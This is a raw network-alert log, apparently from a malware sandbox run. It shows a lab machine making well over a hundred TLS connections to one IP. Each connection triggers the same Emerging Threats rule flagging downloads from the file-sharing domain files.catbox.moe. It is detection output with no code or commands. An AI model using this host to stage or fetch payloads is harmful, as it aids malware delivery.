TCP 192.168.56.101:49506 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49244 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49258 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49488 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49521 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49222 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49514 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49480 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49232 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49492 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49519 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49272 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49436 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49413 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49371 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49470 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49505 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49415 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49390 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49410 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49425 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49391 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49447 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49456 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49207 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49424 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49270 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49361 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49268 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49318 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49344 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49406 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49477 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49451 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49304 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49353 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49520 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49473 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49430 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49234 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49238 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49450 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49399 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49254 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49428 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49441 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49503 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49327 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49278 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49250 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49383 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49329 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49301 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49326 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49464 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49429 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49403 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49427 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49462 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49363 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49411 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49224 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49300 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49288 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49253 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49348 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49303 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49298 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49490 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49341 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49401 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49242 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49455 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49260 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49219 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49466 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49508 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49460 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49405 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49246 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49218 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49376 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49323 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49372 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49212 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49419 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49463 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49349 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49432 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49221 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49294 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49445 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49324 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49507 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49472 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49340 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49239 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49370 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49295 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49271 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49471 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49252 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49380 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49487 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49459 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49359 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49199 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49417 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49518 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49202 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49312 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49443 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49442 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49485 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49511 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49479 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49402 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49458 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49350 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49206 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49339 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49491 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49196 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49396 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49261 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49351 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49338 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49229 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49381 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49280 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49438 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49457 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49282 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49314 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49333 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49352 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49515 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49407 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49366 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49309 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49484 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49389 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49476 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49454 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49299 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49501 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49393 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49384 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49517 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49289 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49475 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49216 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49465 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49273 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49225 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49440 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49373 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49420 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49422 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49305 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49343 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49241 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49414 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49397 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49302 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49409 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49236 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49369 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49325 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49240 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49412 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49319 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49446 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49195 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49281 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49209 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49290 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
